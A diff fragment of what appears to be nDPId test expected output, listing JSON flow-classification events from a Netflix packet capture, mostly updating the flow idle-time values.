-00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
-00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1484319033886,"flow_last_seen":1484319113019,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
-00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319032865,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
